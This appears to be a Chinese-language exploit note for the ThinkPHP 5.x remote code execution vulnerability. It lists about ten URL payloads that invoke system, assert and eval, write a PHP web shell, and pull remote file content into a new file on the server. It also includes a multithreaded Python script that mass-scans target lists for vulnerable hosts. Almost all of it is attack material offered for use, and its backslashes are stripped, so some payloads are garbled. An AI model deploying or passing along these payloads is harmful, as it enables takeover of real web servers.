1、代码执行: hinkRequest/input&filter=phpinfo&data=1
2、命令执行: hinkRequest/input&filter=system&data=dir
各个版本的执行方式各不相同, 未测试的一些POC:
1. /index.php?s=index/ hinkRequest/input&filter=phpinfo&data=1 2. /index.php?s=index/ hinkRequest/input&filter=system&data=id 3. /index.php?s=index/ hink emplatedriverfile/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E 4. /index.php?s=index/ hinkviewdriverPhp/display&content=%3C?php%20phpinfo();?%3E 5. /index.php?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 6. /index.php?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 7. /index.php?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 8. /index.php?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 9. /index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET['joker']);&joker=system("whoami"); 10. /index.php?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=print_r(file_put_contents(%27xx.php%27,file_get_contents(%27 (先file_get_contents读取远程文件内容为一句话 然后file_put_contents在当前目录下写入文件 而且不带<>)
批量检测漏洞的脚本POC, 本人未测试:
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' name: thinkphp远程代码检测 description: ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞 ''' import re import sys import requests import queue import threading from bs4 import BeautifulSoup class thinkphp_rce(threading.Thread): def __init__(self, q): threading.Thread.__init__(self) self.q = q def run(self): while not self.q.empty(): url=self.q.get() headers = {"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"} payload = r"/?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" vulnurl = url + payload try: response = requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False) soup = BeautifulSoup(response.text,"lxml") if 'PHP Version' in str(soup.text): print ('[+] Remote code execution vulnerability exists at the target address') print ('[+] Vulnerability url address ' + vulnurl) with open('target.txt','a') as f1: f1.write(vulnurl+' ') f1.close() else: print ('[-] There is no remote code execution vulnerability in the target address') except: print ('[!] Destination address cannot be connected') def urlget(): with open('url.txt','r')as f: urls=f.readlines() for tmp in urls: if '//' in tmp: url=tmp.strip(' ') urlList.append(url) else: url='http://'+tmp.strip(' ') urlList.append(url) return(urlList) f.close() if __name__=="__main__": print('''----------------扫描开始------------------- *Made by :tdcoming *For More : *MY Heart : _______ _ _ |__ __| | | (_) | | __| | ___ ___ _ __ ___ _ _ __ __ _ | | / _` | / __|/ _ | '_ ` _ | || '_ / _` | | || (_| || (__| (_) || | | | | || || | | || (_| | |_| \__,_| \___|\___/ |_| |_| |_||_||_| |_| \__, | __/ | |___/ ''') urlList=[] urlget() threads = [] threads_count = 10 q=queue.Queue() for url in urlList: q.put(url) for i in range(threads_count): threads.append(thinkphp_rce(q)) for i in threads: i.start() for i in threads: i.join()